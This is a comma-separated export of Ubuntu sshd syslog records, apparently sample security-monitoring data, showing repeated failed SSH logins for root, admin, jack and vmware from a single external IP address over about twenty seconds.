+7699,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:00,UbuntuDevEnv,2019-06-11 13:00:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=89.101.149.137,90014,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,,0,
+7700,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:00,UbuntuDevEnv,2019-06-11 13:00:59,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90014,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7701,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:02,UbuntuDevEnv,2019-06-11 13:01:01,auth,UbuntuDevEnv,err,error: Received disconnect from 89.101.149.137 port 20465:3: com.jcraft.jsch.JSchException: Auth fail [preauth],90014,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,89.101.149.1,20465,,
+7702,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:02,UbuntuDevEnv,2019-06-11 13:01:01,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 89.101.149.137 port 20465 ssh2,90014,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,89.101.149.1,20465,,
+7703,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:02,UbuntuDevEnv,2019-06-11 13:01:01,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 89.101.149.137 port 20465 [preauth],90014,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,89.101.149.1,20465,,
+7704,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:02,UbuntuDevEnv,2019-06-11 13:01:01,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 20538,90026,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,20538,,
+7705,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:02,UbuntuDevEnv,2019-06-11 13:01:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=89.101.149.137  user=root,90027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,89.101.149.1,,0,
+7706,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:04,UbuntuDevEnv,2019-06-11 13:01:03,auth,UbuntuDevEnv,info,Failed password for root from 89.101.149.137 port 20539 ssh2,90027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,89.101.149.1,20539,,
+7707,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:04,UbuntuDevEnv,2019-06-11 13:01:03,auth,UbuntuDevEnv,err,error: Received disconnect from 89.101.149.137 port 20539:3: com.jcraft.jsch.JSchException: Auth fail [preauth],90027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,89.101.149.1,20539,,
+7708,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:04,UbuntuDevEnv,2019-06-11 13:01:03,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 89.101.149.137 port 20539 [preauth],90027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,89.101.149.1,20539,,
+7709,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:04,UbuntuDevEnv,2019-06-11 13:01:03,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 20557,90036,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,20557,,
+7710,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:04,UbuntuDevEnv,2019-06-11 13:01:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=89.101.149.137  user=root,90037,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,89.101.149.1,,0,
+7711,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:05,UbuntuDevEnv,2019-06-11 13:01:05,auth,UbuntuDevEnv,info,Failed password for root from 89.101.149.137 port 20559 ssh2,90037,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,89.101.149.1,20559,,
+7712,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:05,UbuntuDevEnv,2019-06-11 13:01:05,auth,UbuntuDevEnv,err,error: Received disconnect from 89.101.149.137 port 20559:3: com.jcraft.jsch.JSchException: Auth fail [preauth],90037,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,89.101.149.1,20559,,
+7713,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:05,UbuntuDevEnv,2019-06-11 13:01:05,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 89.101.149.137 port 20559 [preauth],90037,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,89.101.149.1,20559,,
+7714,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:05,UbuntuDevEnv,2019-06-11 13:01:05,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 20578,90042,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,20578,,
+7715,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:05,UbuntuDevEnv,2019-06-11 13:01:05,auth,UbuntuDevEnv,info,Invalid user jack from 89.101.149.137 port 20579,90043,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jack,89.101.149.1,20579,,
+7716,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:05,UbuntuDevEnv,2019-06-11 13:01:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90043,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7717,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:05,UbuntuDevEnv,2019-06-11 13:01:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=89.101.149.137,90043,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,,0,
+7718,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:08,UbuntuDevEnv,2019-06-11 13:01:07,auth,UbuntuDevEnv,info,Failed password for invalid user jack from 89.101.149.137 port 20579 ssh2,90043,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jack,89.101.149.1,20579,,
+7719,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:08,UbuntuDevEnv,2019-06-11 13:01:07,auth,UbuntuDevEnv,info,Disconnected from invalid user jack 89.101.149.137 port 20579 [preauth],90043,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jack,89.101.149.1,20579,,
+7720,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:08,UbuntuDevEnv,2019-06-11 13:01:07,auth,UbuntuDevEnv,err,error: Received disconnect from 89.101.149.137 port 20579:3: com.jcraft.jsch.JSchException: Auth fail [preauth],90043,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,89.101.149.1,20579,,
+7721,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:08,UbuntuDevEnv,2019-06-11 13:01:07,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 20591,90054,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,20591,,
+7722,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:08,UbuntuDevEnv,2019-06-11 13:01:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=89.101.149.137  user=root,90056,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,89.101.149.1,,0,
+7723,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:10,UbuntuDevEnv,2019-06-11 13:01:10,auth,UbuntuDevEnv,info,Failed password for root from 89.101.149.137 port 20592 ssh2,90056,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,89.101.149.1,20592,,
+7724,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:10,UbuntuDevEnv,2019-06-11 13:01:10,auth,UbuntuDevEnv,err,error: Received disconnect from 89.101.149.137 port 20592:3: com.jcraft.jsch.JSchException: Auth fail [preauth],90056,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,89.101.149.1,20592,,
+7725,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:10,UbuntuDevEnv,2019-06-11 13:01:10,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 89.101.149.137 port 20592 [preauth],90056,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,89.101.149.1,20592,,
+7726,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:10,UbuntuDevEnv,2019-06-11 13:01:10,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 20605,90066,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,20605,,
+7727,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:11,UbuntuDevEnv,2019-06-11 13:01:10,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=89.101.149.137  user=root,90067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,89.101.149.1,,0,
+7728,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:12,UbuntuDevEnv,2019-06-11 13:01:12,auth,UbuntuDevEnv,info,Failed password for root from 89.101.149.137 port 20606 ssh2,90067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,89.101.149.1,20606,,
+7729,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:12,UbuntuDevEnv,2019-06-11 13:01:12,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 89.101.149.137 port 20606 [preauth],90067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,89.101.149.1,20606,,
+7730,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:12,UbuntuDevEnv,2019-06-11 13:01:12,auth,UbuntuDevEnv,err,error: Received disconnect from 89.101.149.137 port 20606:3: com.jcraft.jsch.JSchException: Auth fail [preauth],90067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,89.101.149.1,20606,,
+7731,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:12,UbuntuDevEnv,2019-06-11 13:01:12,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 20611,90077,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,20611,,
+7732,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:12,UbuntuDevEnv,2019-06-11 13:01:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=89.101.149.137  user=root,90078,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,89.101.149.1,,0,
+7733,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:15,UbuntuDevEnv,2019-06-11 13:01:14,auth,UbuntuDevEnv,info,Failed password for root from 89.101.149.137 port 20612 ssh2,90078,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,89.101.149.1,20612,,
+7734,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:15,UbuntuDevEnv,2019-06-11 13:01:14,auth,UbuntuDevEnv,err,error: Received disconnect from 89.101.149.137 port 20612:3: com.jcraft.jsch.JSchException: Auth fail [preauth],90078,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,89.101.149.1,20612,,
+7735,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:15,UbuntuDevEnv,2019-06-11 13:01:14,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 89.101.149.137 port 20612 [preauth],90078,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,89.101.149.1,20612,,
+7736,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:15,UbuntuDevEnv,2019-06-11 13:01:14,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 20623,90089,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,20623,,
+7737,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:15,UbuntuDevEnv,2019-06-11 13:01:14,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 89.101.149.137 port 20624 [preauth],90090,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,89.101.149.1,20624,,
+7738,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:15,UbuntuDevEnv,2019-06-11 13:01:14,auth,UbuntuDevEnv,err,error: Received disconnect from 89.101.149.137 port 20624:3: com.jcraft.jsch.JSchException: Auth fail [preauth],90090,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,89.101.149.1,20624,,
+7739,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:15,UbuntuDevEnv,2019-06-11 13:01:14,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 20625,90093,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,20625,,
+7740,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:15,UbuntuDevEnv,2019-06-11 13:01:14,auth,UbuntuDevEnv,info,Invalid user admin from 89.101.149.137 port 20626,90095,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,89.101.149.1,20626,,
+7741,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:15,UbuntuDevEnv,2019-06-11 13:01:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=89.101.149.137,90095,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,,0,
+7742,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:15,UbuntuDevEnv,2019-06-11 13:01:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90095,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7743,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:16,UbuntuDevEnv,2019-06-11 13:01:15,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 89.101.149.137 port 20626 ssh2,90095,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,89.101.149.1,20626,,
+7744,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:16,UbuntuDevEnv,2019-06-11 13:01:15,auth,UbuntuDevEnv,err,error: Received disconnect from 89.101.149.137 port 20626:3: com.jcraft.jsch.JSchException: Auth fail [preauth],90095,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,89.101.149.1,20626,,
+7745,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:16,UbuntuDevEnv,2019-06-11 13:01:15,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 89.101.149.137 port 20626 [preauth],90095,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,89.101.149.1,20626,,
+7746,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:16,UbuntuDevEnv,2019-06-11 13:01:15,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 20640,90103,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,20640,,
+7747,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:16,UbuntuDevEnv,2019-06-11 13:01:15,auth,UbuntuDevEnv,info,Invalid user admin from 89.101.149.137 port 20641,90104,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,89.101.149.1,20641,,
+7748,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:16,UbuntuDevEnv,2019-06-11 13:01:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=89.101.149.137,90104,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,,0,
+7749,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:16,UbuntuDevEnv,2019-06-11 13:01:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90104,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7750,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:17,UbuntuDevEnv,2019-06-11 13:01:17,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 89.101.149.137 port 20641 ssh2,90104,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,89.101.149.1,20641,,
+7751,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:17,UbuntuDevEnv,2019-06-11 13:01:17,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 89.101.149.137 port 20641 [preauth],90104,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,89.101.149.1,20641,,
+7752,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:17,UbuntuDevEnv,2019-06-11 13:01:17,auth,UbuntuDevEnv,err,error: Received disconnect from 89.101.149.137 port 20641:3: com.jcraft.jsch.JSchException: Auth fail [preauth],90104,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,89.101.149.1,20641,,
+7753,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:17,UbuntuDevEnv,2019-06-11 13:01:17,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 20644,90108,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,20644,,
+7754,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:17,UbuntuDevEnv,2019-06-11 13:01:17,auth,UbuntuDevEnv,info,Invalid user vmware from 89.101.149.137 port 20645,90109,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vmware,89.101.149.1,20645,,
+7755,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:17,UbuntuDevEnv,2019-06-11 13:01:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=89.101.149.137,90109,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,,0,
+7756,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:17,UbuntuDevEnv,2019-06-11 13:01:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90109,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7757,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:19,UbuntuDevEnv,2019-06-11 13:01:19,auth,UbuntuDevEnv,err,error: Received disconnect from 89.101.149.137 port 20645:3: com.jcraft.jsch.JSchException: Auth fail [preauth],90109,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,89.101.149.1,20645,,
